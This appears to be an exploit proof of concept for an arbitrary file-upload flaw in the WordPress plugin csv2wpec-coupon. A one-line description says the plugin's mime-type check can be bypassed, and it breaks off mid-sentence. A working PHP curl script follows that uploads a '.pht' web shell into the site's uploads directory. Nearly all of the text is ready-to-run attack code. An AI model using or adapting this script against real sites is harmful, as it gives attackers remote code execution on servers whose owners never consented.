The code in csv2wpecCoupon_FileUpload.php does not properly sanitize user input, it checks the file mime-type for type x-php but this can be tricked when using the short code for
<?php
echo "Running PoC against target site<br>";
$uploadfile="/var/www/s.pht";
$ch =
curl_init("http://192.168.0.47/wp-content/plugins/csv2wpec-coupon/csv2wpecCoupon_FileUpload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('UPLOAD_DIR'=>'/usr/share/wordpress/wp-content/uploads/','OP_TYPE'=>'shell','DATA_KEY'=>1,'shell_file'=>"@$uploadfile",'folder'=>'/usr/share/wordpress/wp-content/uploads/','name'=>'s.pht'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>